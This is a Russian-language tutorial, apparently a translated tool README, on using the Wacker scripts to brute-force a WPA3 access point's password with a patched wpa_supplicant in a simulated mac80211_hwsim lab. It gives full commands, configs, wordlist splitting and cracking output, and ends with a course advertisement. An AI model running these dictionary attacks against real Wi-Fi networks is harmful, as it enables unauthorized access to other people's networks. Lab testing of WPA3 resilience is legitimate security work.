Wacker — набор скриптов, помогающих выполнить атаку по онлайн-словарю на точку доступа WPA3.
Wacker использует интерфейс управления wpa_supplicant для управления операциями демона соискателя, а также для получения информации о состоянии и уведомлений о событиях, что в конечном итоге помогает ускорить попытки подключения во время попыток грубой силы.
Помогает найти настоящую точку доступа для использования
Виртуальная Wi-Fi Арена
Настроить локальную среду млжно спомощью mac80211_hwsim (подробности ниже) или используйте виртуальные машины, предоставленные RF Hackers Sanctuary (настоятельно рекомендуется). Тестирование проводилось почти исключительно с использованием смоделированной среды mac80211 и работало очень хорошо.
Местные моделируемые радиостанции:
Чтобы настроить собственный программный симулятор радиомодуля 802.11, просто настройте и загрузите правильный модуль mac80211_hwsim.
# modprobe mac80211_hwsim radios=4
# iwconfig
wlan0 IEEE 802.11 ESSID:off/any
Mode:Managed Access Point: Not-Associated Tx-Power=20 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:onwlan1 IEEE 802.11 ESSID:off/any
Mode:Managed Access Point: Not-Associated Tx-Power=20 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:onwlan2 IEEE 802.11 ESSID:off/any
Mode:Managed Access Point: Not-Associated Tx-Power=20 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:onwlan3 IEEE 802.11 ESSID:off/any
Mode:Managed Access Point: Not-Associated Tx-Power=20 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:on
Выберите один из новых интерфейсов в качестве точки доступа WPA3 и используйте следующий файл conf.
# cat hostapd.conf
interface=wlan0
ssid=WCTF_18
driver=nl80211
hw_mode=g
channel=1
logger_syslog=-1
logger_syslog_level=3
wpa=2
wpa_passphrase=Aeromechanics
wpa_key_mgmt=SAE
rsn_pairwise=CCMP
ieee80211w=2
group_mgmt_cipher=AES-128-CMAC
И запустите hostapd с
# hostapd -K -dd hostapd.conf
Разделить список слов
Если у вас есть намерение распределить свои усилия по взлому через серию сетевых устройств, предоставленный скрипт split.sh разделит за вас список слов.
# ./split.sh 10 cyberpunk.words
50916 cyberpunk.words.aaa
50916 cyberpunk.words.aab
50916 cyberpunk.words.aac
50916 cyberpunk.words.aad
50916 cyberpunk.words.aae
50916 cyberpunk.words.aaf
50916 cyberpunk.words.aag
50916 cyberpunk.words.aah
50916 cyberpunk.words.aai
50907 cyberpunk.words.aaj
509151 total
Сборка wpa_supplicant:
Мы предоставляем наш собственный wpa_supplicant, чтобы гарантировать установку определенных конфигураций, а также нескольких модов, которые должны выполняться в самом исходном коде. Для сборки просто сделайте следующее. Надеюсь, в будущем это станет устаревшим шагом.
# apt-get install -y pkg-config libnl-3-dev gcc libssl-dev libnl-genl-3-dev
# cd wpa_supplicant-2.8/wpa_supplicant/
# cp defconfig_brute_force .config
# make -j4
# ls -al wpa_supplicant
-rwxr-xr-x 1 root root 13541416 May 31 16:30 wpa_supplicant
Представляет интерес несколько новых сообщений о событиях, которые были добавлены в интерфейс управления запрашивающим устройством wpa, чтобы помочь различать результаты перехватов сценария wacker.
/** auth success for our brute force stuff (WPA3) */
#define WPA_EVENT_BRUTE_SUCCESS "CTRL-EVENT-BRUTE-SUCCESS "
/** auth failure for our brute force stuff (WPA3) */
#define WPA_EVENT_BRUTE_FAILURE "CTRL-EVENT-BRUTE-FAILURE "
Запуск wacker
Скрипт wacker.py предназначен для выполнения всей тяжелой работы.
# ./wacker.py --help
usage: wacker.py [-h] --wordlist WORDLIST --interface INTERFACE --bssid BSSID
--ssid SSID --freq FREQ [--start START_WORD] [--debug]A WPA3 dictionary cracker. Must run as root!optional arguments:
-h, --help show this help message and exit
--wordlist WORDLIST wordlist to use
--interface INTERFACE
interface to use
--bssid BSSID bssid of the target
--ssid SSID the ssid of the WPA3 AP
--freq FREQ frequency of the ap
--start START_WORD word to start with in the wordlist
--debug increase logging output
Если повезет запустить атаку, используя только один экземпляр.
# ./wacker.py --wordlist cyberpunk.words --ssid WCTF_18 --bssid 02:00:00:00:00:00 --interface wlan2 --freq 2412
Start time: 21 Aug 2020 07:40:11
Starting wpa_supplicant...
5795 / 509151 words (1.14%) : 79.41 words/sec : 0.020 hours lapsed : 1.76 hours to exhaust (21 Aug 2020 09:25:49)
Found the password: 'Aeromechanics'Stop time: 21 Aug 2020 07:41:24
Запустить несколько экземпляров wacker легко, если у вас есть запасные устройства. Не забудьте также разделить список слов.
# ./wacker.py --wordlist cyberpunk.words.aaa --ssid WCTF_18 --bssid 02:00:00:00:00:00 --interface wlan1 --freq 2412
# ./wacker.py --wordlist cyberpunk.words.aab --ssid WCTF_18 --bssid 02:00:00:00:00:00 --interface wlan2 --freq 2412
# ./wacker.py --wordlist cyberpunk.words.aac --ssid WCTF_18 --bssid 02:00:00:00:00:00 --interface wlan3 --freq 2412
Файлы:
wacker довольно многословен. Интересующие файлы находятся в / tmp / wacker /
- wlan1: один конец uds
- wlan1_client: один конец uds
- wlan1.conf: требуется начальная конфигурация wpa_supplicant
- wlan1.log: вывод соискателя (только при использовании параметра — debug)
- wlan1.pid: файл pid для экземпляра wpa_supplciant
- wlan1_wacker.log: вывод отладки wacker
А на этом всё
Хочешь научиться большему? Записывайся на наш курс.
Не забудь подписаться на наш канал!